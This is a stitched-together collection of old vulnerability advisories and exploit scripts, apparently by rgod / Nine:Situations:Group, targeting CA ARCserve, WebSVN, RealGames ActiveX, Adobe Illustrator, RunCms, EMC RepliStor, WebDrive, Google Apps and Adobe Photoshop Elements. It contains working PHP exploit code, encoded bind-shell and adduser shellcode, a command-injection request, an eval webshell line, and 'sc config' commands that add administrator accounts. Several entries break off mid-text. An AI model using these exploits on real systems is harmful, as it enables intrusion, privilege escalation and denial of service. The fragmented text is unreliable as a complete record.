//OK[0,17,16,8,15,14,8,13,-3,12,11,8,10,9,8,7,0,6,5,0,4,3,8,2,1,1,[com.ca.arcflash.ui.client.model.TrustHostModel/1126245943,
com.extjs.gxt.ui.client.data.RpcMap/3441186752,port,java.lang.Integer/3438268394,Selected,java.lang.Boolean/476441737,
hostName,java.lang.String/2004016611,RGOD_9SG,uuid,1a580961-1aa7-4225-b3aa-a522649c16ec,type,
user,Administrator,password,MY_PASSWORD,Protocol],0,5]
Clear text! Clear text!!!
Username - Administrator
Password - MY_PASSWORD
A remote attacker could then login to the affected application
then execute arbitrary commands with Administrator group privileges
in the following way:
Browse Backup settings;
Click Advanced tab;
Check Run a command before backup is started;
Fill the white field with the desired command, ex. cmd /c start calc ;
Fill the credentials fields with the gained username and password
(you can use the same you had before);
Select an existing backup destination in the Protection Settings tab;
Browse to the main page and clicking Backup Now;
Select Incremental Backup and press OK;
calc.exe is launched various times.
Other attacks are possible.
Vulnerable code and explaination:
web.xml :
..
servlet
servlet-namehomepageServlet/servlet-name
servlet-classcom.ca.arcflash.ui.server.HomepageServiceImpl/servlet-class
load-on-startup1/load-on-startup
/servlet
servlet-mapping
servlet-namehomepageServlet/servlet-name
url-pattern/contents/service/homepage/url-pattern
/servlet-mapping
..
the decompiled HomepageServiceImpl.class :
..
public TrustHostModel getLocalHost()
throws BusinessLogicException, ServiceConnectException,
ServiceInternalException
{
try
{
TrustedHost trustedhost =
getLocalWebServiceClient().getLocalHostAsTrust();
TrustHostModel trusthostmodel = ConvertToModel(trustedhost);
return trusthostmodel;
}
catch(AxisFault axisfault)
{
axisfault.printStackTrace();
}
return null;
}
..
the decompiled WebServiceClient.class :
..
public TrustedHost getLocalHostAsTrust()
throws AxisFault
{
Object aobj[] = invokeWebMethod(getLocalHostAsTrust, new Object[0],
new Class[] { //
com/ca/arcflash/webservice/data/TrustedHost
});
return (TrustedHost)aobj[0];
}
..
a request to the FlashServiceImpl Axis2 Web Service is originated
note that the ip address originating the request is
WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability
WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection
Vulnerability
tested against: Microsoft Windows Server R2 SP2
PHP 5.3.6 VC9 with magic_quotes_gpc = off (default)
Apache 2.2.17 VC9
Introduction:
This is a very special vulnerabilty, given the incredibly high number
of machines involved. This can be verified by submitting the following
queries to Google:
Powered by WebSVN * and Subversion
Powered by WebSVN 2.3.2 and Subversion
homepage url: http://websvn.tigris.org/
Description says:
WebSVN offers a view onto your subversion repositories that's been designed to
reflect the Subversion methodology. You can view the log of any file or
directory
and see a list of all the files changed, added or deleted in any given revision.
You can also view compare two versions of a file so as to see exactly what was
changed in a particular revision.
Since it's written using PHP, WebSVN is very portable and easy to install.
Vulnerabilty:
Without prior authentication, if the 'allowDownload' option is enabled
in config.php, meaning that a tarball download is allowed across all the
repositories (not uncommon), an attacker can invoke the dl.php script
and passing a well formed 'path' argument to execute arbitrary
commands against the underlying operating system.
Vulnerable code:
look at dl.php, lines 114-139:
..
} else {
@unlink($tempDir);
mkdir($tempDir);
// Create the name of the directory being archived
$archiveName = $path;
$isDir = (substr($archiveName, -1) == '/');
if ($isDir) {
$archiveName = substr($archiveName, 0, -1);
}
$archiveName = basename($archiveName);
if ($archiveName == '') {
$archiveName = $rep-name;
}
$plainfilename = $archiveName;
$archiveName .= '.r'.$rev;
// Export the requested path from SVN repository to the temp
directory
$svnExportResult = $svnrep-exportRepositoryPath($path,
$tempDir.DIRECTORY_SEPARATOR.$archiveName, $rev, $peg);
if ($svnExportResult != 0) {
header('HTTP/1.x 500 Internal Server Error', true, 500);
error_log('svn export failed for: '.$archiveName);
print 'svn export failed for
'.xml_entities($archiveName).'.';
removeDirectory($tempDir);
exit(0);
}
..
then look at exportRepositoryPath() function inside ./include/svnlook.php,
lines 879-896:
..
// {{{ exportDirectory
//
// Exports the directory to the given location
function exportRepositoryPath($path, $filename, $rev = 0, $peg = '') {
$cmd = $this-svnCommandString('export', $path, $rev, $peg).'
'.quote($filename); //---
$retcode = 0;
execCommand($cmd, $retcode); //--
if ($retcode != 0) {
global $lang;
error_log($lang['BADCMD'].': '.escape($cmd));
}
return $retcode;
}
// }}}
..
again look at execCommand() function inside ./include/command.php, lines
107-123:
..
// {{{ execCommand
function execCommand($cmd, $retcode) {
global $config;
// On Windows machines, the whole line needs quotes round it so that
it's
// passed to cmd.exe correctly
// Since php 5.3.0 the quoting seems to be done internally
if ($config-serverIsWindows version_compare(PHP_VERSION,
'5.3.0alpha') === -1) {
$cmd = ''.$cmd.''; // nonsense ...
}
return @exec($cmd, $tmp, $retcode); //- boom
}
// }}}
..
also, look at quote() inside ./include/command.php:
..
// {{{ quote
//
// Quote a string to send to the command line
function quote($str) {
global $config;
if ($config-serverIsWindows) {
return ''.$str.''; //--- !!!
} else {
return escapeshellarg($str); // this should work
properly on Linux instead
}
}
// }}}
..
Example packet:
POST /websvn/dl.php HTTP/1.1
User-Agent: Mozilla/4.0
Host: 192.168.0.1
Accept: */*
Cookie: storedsesstemplate=.%00; storedtemplate=.%00;
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
path=./../../x%22%7Cver%3Esuntzu.txt%7C%22
the resulting command line is like this:
c:\SVN\bin\svn --non-interactive --config-dir C:\SVN\tmp\export
URL%20to%20repository%20%28e.g.%20file:///d:/SubVersion/proj%29./../../x%22%7Cver%3Esuntzu.txt%7C%22@
C:\Documents and Settings
\Administrator\Local Settings\Temp\web554.tmp\x|versuntzu.txt|.r
Re: ZDI-11-117: McAfee Firewall Reporter GeneralUtilities.pm isValidClient Authentication Bypass Vulnerability
McAfee stated: [quote] Impact of Vulnerability: Disabling Anti-Virus, adding unwanted exclusions [/quote] When submitting this bug to ZDI, I made availiable two reliable post-bypass proof-of-concepts: - a static perl code injection exploit using the 'args' argument of saveTopImagelogos.cgi - an upload and execute exploit using uploadFile.cgi In both cases, the result was remote command execution with SYSTEM privileges. This was tested against the default Apache installation. ZDI did not acquire post-auth vulnerabilities, so I was considering to disclose them after the patch was out but, in the end, not. I'm saying this to allow people to classify this vulnerability with the correct metrics. rgod
RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution and Code Execution Vulnerabilities
RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control
(InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution
and Code Execution Vulnerabilities
tested against Internet Explorer 9, Vista sp2
download url: http://www.gamehouse.com/
background:
When choosing to play with theese online games ex. the game called
My Farm Life (see url: http://www.gamehouse.com/download-games/my-farm-life )
you download an installer called
GameHouse-Installer_am-myfarmlife_gamehouse_.exe
This setup program installs an ActiveX with the following settings:
CLSID: {80AB3FB6-9660-416C-BE8D-0E2E8AC3138B}
Progid: StubbyUtil.ShellCtl.1
Binary Path: C:\Program Files\RealArcade\Installer\bin\InstallerDlg.dll
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True
This control is safe for scripting and safe for initialization,
so Internet Explorer will allow scripting of this control from
remote.
vulnerability:
This control has four methods implemented insecurely:
ShellExec() - allows to launch arbitrary commands
ShellExecRunAs() - allows to launch arbitrary commands
CreateShortcut() - allows to create arbitrary executable files inside the
automatic
startup folders
CopyDocument() - allows to copy arbitrary executable files from a remote
network share to local folders, ex. automatic startup
folders
other attacks are possible including information disclosure and file deletion,
see typelib:
class IShellCtl { /* GUID={0D60A064-2009-4623-8FC1-F99CAC01037E} */
/* DISPID=1610612736 */
function QueryInterface(
/* VT_PTR [26] [in] -- ? [29] */ $riid,
/* VT_PTR [26] [out] -- VT_PTR [26] */ $ppvObj
)
{
}
/* DISPID=1610612737 */
/* VT_UI4 [19] */
function AddRef(
)
{
}
/* DISPID=1610612738 */
/* VT_UI4 [19] */
function Release(
)
{
}
/* DISPID=1610678272 */
function GetTypeInfoCount(
/* VT_PTR [26] [out] -- VT_UINT [23] */ $pctinfo
)
{
}
/* DISPID=1610678273 */
function GetTypeInfo(
/* VT_UINT [23] [in] */ $itinfo,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_PTR [26] [out] -- VT_PTR [26] */ $pptinfo
)
{
}
/* DISPID=1610678274 */
function GetIDsOfNames(
/* VT_PTR [26] [in] -- ? [29] */ $riid,
/* VT_PTR [26] [in] -- VT_PTR [26] */ $rgszNames,
/* VT_UINT [23] [in] */ $cNames,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_PTR [26] [out] -- VT_I4 [3] */ $rgdispid
)
{
}
/* DISPID=1610678275 */
function Invoke(
/* VT_I4 [3] [in] */ $dispidMember,
/* VT_PTR [26] [in] -- ? [29] */ $riid,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_UI2 [18] [in] */ $wFlags,
/* VT_PTR [26] [in] -- ? [29] */ $pdispparams,
/* VT_PTR [26] [out] -- VT_VARIANT [12] */ $pvarResult,
/* VT_PTR [26] [out] -- ? [29] */ $pexcepinfo,
/* VT_PTR [26] [out] -- VT_UINT [23] */ $puArgErr
)
{
}
/* DISPID=1 */
function CreateShortcut(
/* VT_PTR [26] [in] -- VT_BSTR [8] */ $name,
/* VT_PTR [26] [in] -- VT_BSTR [8] */ $target,
/* VT_PTR [26] [in] -- VT_BSTR [8] */ $icon,
/* VT_PTR [26] [in] -- VT_BSTR [8] */ $workingDir,
/* VT_PTR [26] [in] -- VT_BSTR [8] */ $args
)
{
/* method CreateShortcut */
}
/* DISPID=2 */
function DeleteShortcut(
/* VT_PTR [26] [in] -- VT_BSTR [8] */ $name
)
{
/* method DeleteShortcut */
}
/* DISPID=3 */
/* VT_BSTR [8] */
function ModuleFileName(
)
{
/* method ModuleFileName */
}
/* DISPID=4 */
/* VT_BSTR [8] */
function GetSpecialFolder(
/* VT_UI4 [19] [in] */ $__MIDL_0025
)
{
/* method GetSpecialFolder */
}
/* DISPID=5 */
/* VT_BOOL [11] */
function CheckWnd(
/* VT_PTR [26] [in] -- VT_BSTR [8] */ $__MIDL_0026
)
{
/* method CheckWnd */
}
/* DISPID=6 */
/* VT_BSTR [8] */
function ExistingTPS(
/* VT_PTR [26] [in] -- VT_BSTR [8] */ $__MIDL_0028
)
{
/* method ExistingTPS */
}
/* DISPID=7 */
function SetWorkingDir(
/* VT_PTR [26] [in] -- VT_BSTR [8]
RealNetworks RealGames StubbyUtil.ProcessMgr.1 ActiveX Control (InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution Vulnerabilities
RealNetworks RealGames StubbyUtil.ProcessMgr.1 ActiveX Control
(InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution
Vulnerabilities
tested against Internet Explorer 9, Vista sp2
download url: http://www.gamehouse.com/
background:
When choosing to play with theese online games ex. the game called
My Farm Life (see url: http://www.gamehouse.com/download-games/my-farm-life )
you download an installer called
GameHouse-Installer_am-myfarmlife_gamehouse_.exe
This setup program installs an ActiveX with the following settings:
CLSID: {5818813E-D53D-47A5-ABBB-37E2A07056B5}
Progid: StubbyUtil.ProcessMgr.1
Binary Path: C:\Program Files\RealArcade\Installer\bin\InstallerDlg.dll
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True
This control is safe for scripting and safe for initialization,
so Internet Explorer will allow scripting of this control from
remote.
vulnerability:
This control has four methods implemented insecurely:
CreateVistaTaskLow() - allows to launch arbitrary commands
Exec()- allows to launch arbitrary commands
ExecLow() - allows to launch arbitrary commands
ShellExec() - allows to launch arbitrary executables
other attacks are possible ,
see typelib:
class IProcessMgr { /* GUID={860450DB-79C1-44E4-96E0-C89144E4B444} */
/* DISPID=1610612736 */
function QueryInterface(
/* VT_PTR [26] [in] -- ? [29] */ $riid,
/* VT_PTR [26] [out] -- VT_PTR [26] */ $ppvObj
)
{
}
/* DISPID=1610612737 */
/* VT_UI4 [19] */
function AddRef(
)
{
}
/* DISPID=1610612738 */
/* VT_UI4 [19] */
function Release(
)
{
}
/* DISPID=1610678272 */
function GetTypeInfoCount(
/* VT_PTR [26] [out] -- VT_UINT [23] */ $pctinfo
)
{
}
/* DISPID=1610678273 */
function GetTypeInfo(
/* VT_UINT [23] [in] */ $itinfo,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_PTR [26] [out] -- VT_PTR [26] */ $pptinfo
)
{
}
/* DISPID=1610678274 */
function GetIDsOfNames(
/* VT_PTR [26] [in] -- ? [29] */ $riid,
/* VT_PTR [26] [in] -- VT_PTR [26] */ $rgszNames,
/* VT_UINT [23] [in] */ $cNames,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_PTR [26] [out] -- VT_I4 [3] */ $rgdispid
)
{
}
/* DISPID=1610678275 */
function Invoke(
/* VT_I4 [3] [in] */ $dispidMember,
/* VT_PTR [26] [in] -- ? [29] */ $riid,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_UI2 [18] [in] */ $wFlags,
/* VT_PTR [26] [in] -- ? [29] */ $pdispparams,
/* VT_PTR [26] [out] -- VT_VARIANT [12] */ $pvarResult,
/* VT_PTR [26] [out] -- ? [29] */ $pexcepinfo,
/* VT_PTR [26] [out] -- VT_UINT [23] */ $puArgErr
)
{
}
/* DISPID=1 */
/* VT_BOOL [11] */
function Exec(
/* VT_PTR [26] [in] -- VT_BSTR [8] */ $mod,
/* VT_PTR [26] [in] -- VT_BSTR [8] */ $cmdline,
/* VT_BOOL [11] [in] */ $__MIDL_0097,
/* VT_BOOL [11] [in] */ $__MIDL_0098,
/* VT_PTR [26] [in] -- VT_BSTR [8] */ $__MIDL_0099
)
{
/* method Exec */
}
/* DISPID=2 */
/* VT_BOOL [11] */
function IsFinished(
)
{
}
/* DISPID=3 */
/* VT_UI4 [19] */
function CreateNamedMutex(
/* VT_BSTR [8] [in] */ $__MIDL_0102
)
{
}
/* DISPID=4 */
function ReleaseMutex(
/* VT_UI4 [19] [in] */ $__MIDL_0104
)
{
}
/* DISPID=5 */
function CloseMutex(
/* VT_UI4 [19] [in] */ $__MIDL_0105
)
{
}
/* DISPID=6 */
/* VT_BOOL [11] */
function ObtainMutex(
/* VT_UI4 [19] [in] */ $__MIDL_0106
)
{
}
/* DISPID=7 */
/* VT_BOOL [11] */
function WaitOnMutex(
/* VT_UI4 [19] [in] */ $__MIDL_0108,
/* VT_INT [22] [in] */ $__MIDL_0109
)
{
}
/* DISPID=8 */
function CloseEvent(
/* VT_UI4 [19] [in] */ $__MIDL_0111
)
{
}
/* DISPID=9 */
function FireEvent(
/* VT_UI4 [19] [in] */ $__MIDL_0112
)
{
}
/* DISPID=10 */
/* VT_UI4 [19] */
function
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) Overlong DSC Comment Buffer Overflow Exploit
?php /* Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) overlong DSC Comment Buffer Overflow Exploit by Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ An overlong string as DSC comment (more than 42000 bytes) results in a direct EIP overwrite. Exception is first-chance so the program will never crash. At the moment of the redirection EAX and ESI are user-controlled. This portion of the buffer begins with '%' (it is the next DSC comment) but as you can see the resulting pattern is nop-equivalent. Tested and working against xp sp3 change the call esi if you need, must be alphabetic I used a call esi from comctl32.dll on xp sp3, change if needed. Usage: php 9sg_illu.php then double-click on the resulting 9sg.eps file it will bind a shell on port change the shellcode for your needs even. */ # windows/adduser - 446 bytes # http://www.metasploit.com # Encoder: x86/alpha_mixed # EXITFUNC=seh, USER=adobe, PASS=kills $_scode_i = \xda\xc9\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49 . \x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a . \x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42 . \x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75 . \x4a\x49\x4b\x4c\x4a\x48\x47\x34\x43\x30\x43\x30\x45\x50 . \x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48 . \x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f . \x51\x30\x45\x51\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b . \x43\x31\x4a\x4e\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4d\x54 . \x49\x50\x44\x34\x45\x57\x49\x51\x48\x4a\x44\x4d\x43\x31 . \x49\x52\x4a\x4b\x4a\x54\x47\x4b\x46\x34\x47\x54\x43\x34 . \x43\x45\x4a\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b . \x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c . \x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31\x4a\x4b . \x4d\x59\x51\x4c\x47\x54\x44\x44\x48\x43\x51\x4f\x50\x31 . \x4b\x46\x43\x50\x46\x36\x45\x34\x4c\x4b\x47\x36\x50\x30 . \x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d . \x4c\x4b\x42\x48\x43\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50 . \x42\x4a\x46\x30\x42\x48\x4c\x30\x4d\x5a\x44\x44\x51\x4f . \x45\x38\x4d\x48\x4b\x4e\x4c\x4a\x44\x4e\x51\x47\x4b\x4f . \x4d\x37\x42\x43\x42\x4d\x42\x44\x46\x4e\x45\x35\x43\x48 . \x42\x45\x51\x30\x46\x4f\x45\x33\x47\x50\x42\x4e\x42\x45 . \x42\x54\x51\x30\x43\x45\x43\x43\x45\x35\x43\x42\x51\x30 . \x45\x31\x45\x34\x42\x4f\x42\x42\x43\x55\x47\x50\x42\x4b . \x45\x39\x42\x4c\x42\x4c\x42\x53\x51\x30\x46\x4f\x51\x51 . \x47\x34\x50\x44\x51\x30\x47\x56\x51\x36\x51\x30\x42\x4e . \x42\x45\x44\x34\x47\x50\x42\x4c\x42\x4f\x42\x43\x45\x31 . \x42\x4c\x43\x57\x43\x42\x42\x4f\x44\x35\x44\x30\x47\x50 . \x47\x31\x42\x44\x42\x4d\x42\x49\x42\x4e\x45\x39\x42\x53 . \x43\x44\x42\x52\x45\x31\x43\x44\x42\x4f\x44\x32\x44\x33 . \x51\x30\x45\x31\x45\x34\x42\x4f\x43\x52\x42\x45\x47\x50 . \x46\x4f\x47\x31\x47\x34\x51\x54\x45\x50\x41\x41; # windows/shell_bind_tcp - 696 bytes # http://www.metasploit.com # Encoder: x86/alpha_mixed # EXITFUNC=seh, LPORT=, RHOST= $_scode_ii = \x89\xe5\xda\xd0\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49 . \x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51 . \x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32 . \x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41 . \x42\x75\x4a\x49\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38 . \x4b\x49\x4b\x4f\x4b\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c . \x46\x44\x51\x34\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c . \x43\x35\x43\x48\x43\x31\x4a\x4f\x4c\x4b\x50\x4f\x42\x38 . \x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b . \x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4a\x39 . \x4e\x4c\x4d\x54\x49\x50\x43\x44\x45\x57\x49\x51\x49\x5a . \x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x50\x54 . \x51\x34\x46\x48\x43\x45\x4b\x55\x4c\x4b\x51\x4f\x47\x54 . \x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b . \x51\x4f\x45\x4c\x43\x31\x4a\x4b\x45\x53\x46\x4c\x4c\x4b . \x4b\x39\x42\x4c\x47\x54\x45\x4c\x45\x31\x48\x43\x46\x51 .
RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit
?php
/*
RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL
Injection Exploit
by Nine:Situations:Group::bookoo
site: http://retrogod.altervista.org/
software site: http://www.runcms.org/
vulnerable code in /modules/forum/post.php near lines 16-34 :
...
if ( empty($_POST['forum']) ) {
redirect_header(index.php, 2, _MD_ERRORFORUM);
exit();
}
else if ( empty($_POST['message']) ) {
redirect_header(javascript:history.go(-1), 2, _MD_ERRORMESSAGE);
exit();
}
else {
$sql = SELECT * FROM .$bbTable['forums']. WHERE forum_id =
.$_POST['forum'].; // !!!
if (!$result = $db-query($sql)) {
redirect_header(index.php, 2, _MD_CANTGETFORUM);
exit();
}
...
'forum' variable is taken from $_POST[] array and inserted in a sql query
without
prior santization and without being surrounded by quotes.
Then you can subsequently manipulate this query in
/modules/forum/class/class.permissions.php by passing
another 'UNION SELECT' as first argument of the 'UNION SELECT' passed to
post.php
(a little bit complex uh? $forum_id is user controlled ...)
100-102:
...
if ($user_id 0) {
$sql = SELECT * FROM .$bbTable['forum_access']. WHERE forum_id=$forum_id
AND user_id=$user_id;
...
the result is that you can extract the sha1 hash of the admin user and the
corrispondent salt.
If you cannot decrypt the hash... you can always hijack an active session
(meaning the admin user
must be logged in) by building the admin cookie, no check ex. on ip address.
To do that you need the table prefix. A default one does not exist, but
exists a
'suggested one' when installing the cms, which is 'runcms', but an empty
one is not allowed.
However with MySQL 5.0 you can have the table prefix by interrogating
information_schema.TABLES
This whole thing works regardless of php.ini settings but you need:
- a valid user account
Register!
- an existing row in [prefix]_forum_forums table
- an existing row in [prefix]_forum_forum_access table
which is very possible against a runcms installation with a working and
active forum.
Also, you could manipulate the query in post.php to export a php shell
through
'INTO DUMPFILE' method, but you need FILE privilege and magic_quotes_gpc =
off.
It's also possible to disclose absolute path in certain conditions (see
error_reporting)
by polluting a preg_match() argument:
http://[host]/[path_to_runcms]/modules/contact/index.php?op[]=1
http://[host]/[path_to_runcms]/userinfo.php?uid[]=1
Final notes:
This sql injection vulnerability has to be considerated as high risk
because as ADMIN you
can inject php code by the Filter/Banning functionalities, ex:
click 'Administration Menu', then 'System Admin', then click on the
Filters/Banning icon,
then 'Prohibited: Emails'
Now you can edit the /modules/system/cache/bademails.php file
Type in:
?php eval($_GET[c]);?
then you launch commands:
http://[host]/[path_to_runcms]/modules/system/cache/bademails.php?c=system(dir);
you can do the same with all filter utilities ...
*/
$err[0] = [!] This script is intended to be launched from the cli!;
$err[1] = [!] You need the curl extesion loaded!;
function my_header() {
print
(\x52\x75\x6e\x43\x6d\x73\x20\x76\x2e\x32\x6d\x31\x20\x2f\x6d\x6f\x64\x75\x6c\x65\x73\x2f\x66\x6f\x72\x75\x6d\x2f\x70\x6f\x73\x74\x2e\x70\x68\x70\x20\x2d\x20\x27\x66\x6f\x72\x75\x6d\x27\x20\x72\x65\x6d\x6f\x74\x65\x20\x73\x65\x6d\x69\x2d\x62\x6c\x69\x6e\x64\x20\x53\x51\x4c\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\xd\xa\x62\x79\x20\x4e\x69\x6e\x65\x3a\x53\x69\x74\x75\x61\x74\x69\x6f\x6e\x73\x3a\x47\x72\x6f\x75\x70\x3a\x3a\x62\x6f\x6f\x6b\x6f\x6f\xd\xa\x73\x69\x74\x65\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x74\x72\x6f\x67\x6f\x64\x2e\x61\x6c\x74\x65\x72\x76\x69\x73\x74\x61\x2e\x6f\x72\x67\x2f\xd\xa\n);
}
my_header();
if (php_sapi_name() cli) {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl(php_curl.dll) ? die($err[1]) :
print([*] curl loaded\n);
} else {
!dl(php_curl.so) ? die($err[1]) :
print([*] curl loaded\n);
}
}
function syntax() {
print (
Syntax: php .$argv[0]. [host] [path] [user] [pass] [OPTIONS] \n.
Options:
\n. --port:[port] - specify a port
EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of service
?php
/*
EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of
service poc
by Nine:Situations:Group::bellick
*/
$host = 192.168.0.1;
$port = 7144;
$_sock = fsockopen($host, $port, $errno, $errstr, 2);
if (!$fp) {
echo $errstr ($errno)\n;
} else {
$_p = \x54\x93\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41.
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41. \x41\x41\x41\x41;
fputs($_sock, $_p);
fclose($_sock);
}
?
original url: http://retrogod.altervista.org/9sg_emc_repli_crash.html
South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges
South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges by Nine:Situations:Group::bellick site: http://retrogod.altervista.org/ Software site: http://www.webdrive.com/ Download location: http://www.webdrive.com/download/index.html Tested against: South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3 The WebDrive Service is installed with an empty security descriptor. A malicious user can stop the service, then invoke the sc config command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges ex., run theese commands as a limited user: sc stop WebDriveService sc config WebDriveService binPath= cmd /c net user southriver kills /add net localgroup Administrators southriver /add sc start WebDriveService runas /noprofile /user:%COMPUTERNAME%\southriver cmd now login as administrator with password kills mitigation: the security descriptor of the service is like this: C:\sc sdshow WebDriveService D: change the security descriptor like the following: c:\sc sdset WebDriveService D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY) [SC] SetServiceObjectSecurity SUCCESS original url: http://retrogod.altervista.org/9sg_south_river_priv.html
google apps googleapps.url.mailto:// uri handler cross-browser remote command execution exploit (IE)
google apps googleapps.url.mailto:// uri handler cross-browser remote command execution exploit (Internet Explorer) by nine:situations:group::pyrokinesis site: http://retrogod.altervista.org/ software site: http://pack.google.com/intl/it/pack_installer.html tested against: Internet Explorer 8, windows xp sp3 Internet Explorer 7, windows xp sp3 Google Chrome 2.0.172.43 vulnerability: through the vulnerable googleapps.url.mailto:// deprecated uri handler, registered as follows: [HKEY_CLASSES_ROOT\GoogleApps.Url.mailto] @=Google Apps URL EditFlags=hex:02,00,00,00 FriendlyTypeName=Google Apps URL URL Protocol= [HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\DefaultIcon] @=C:\\Programmi\\Google\\Google Apps\\googleapps.exe,0 [HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell] [HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell\open] [HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell\open\command] @=C:\\Programmi\\Google\\Google Apps\\googleapps.exe --mailto.google.com=\%1\ is possibile, against all versions of Internet Explorer, by injecting the --domain= switch for the googleapps.exe executable to pass arbitrary switches to the Google Chrome chrome.exe executable (which is subsequently launched to open the gmail pages), example: the --renderer-path and --no-sandbox switches Through them is possible to launch an arbitrary executable from the local system: googleapps.url.mailto://%20--domain=--what%20--renderer-path=calc%20--no-sandbox%20--x/ or to launch an arbitrary batch file from a remote network share: googleapps.url.mailto://%20--domain=--x%20--renderer-path=\\192.168.0.1\uncshare\sh.bat%20--no-sandbox%20--x/ the resulting command line for chrome.exe is in this case: C:\Programmi\Google\Chrome\Application\chrome.exe --app=https://mail.google.com/a/--x --renderer-path=\\192.168.0.1\uncshare\sh.bat --no-sandbox --x//?view=cmfs=1to=googleapps.url.mailto%3A%2F%2Frlz=1R6GPCK_en___IT344 which leverages the remote command execution issue Mitigation: unregister the uri handler by deleting the mentioned registry keys original url: http://retrogod.altervista.org/9sg_google_apps_uri.html
Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges
Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges by Nine:Situations:Group::bellick site: http://retrogod.altervista.org/ Tested on Microsoft Windows XP SP3 The Adobe Active File Monitor V8 service is installed with an improper security descriptor. A malicious user of the Users group (which on xp means a limited account) can stop the service, then invoke the sc config command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges ex., run theese commands as a limited user: sc stop AdobeActiveFileMonitor8.0 sc config AdobeActiveFileMonitor8.0 binPath= cmd /c net user adobe kills /add net localgroup Administrators adobe /add sc start AdobeActiveFileMonitor8.0 runas /noprofile /user:%COMPUTERNAME%\adobe cmd now login as administrator with password kills mitigation: the security descriptor of the service is like this: C:\sc sdshow AdobeActiveFileMonitor8.0 D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) note the WO and WD permission for Everyone (!) change the security descriptor like the following: c:\sc sdset AdobeActiveFileMonitor8.0 D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY) [SC] SetServiceObjectSecurity SUCCESS readings, interesting article: 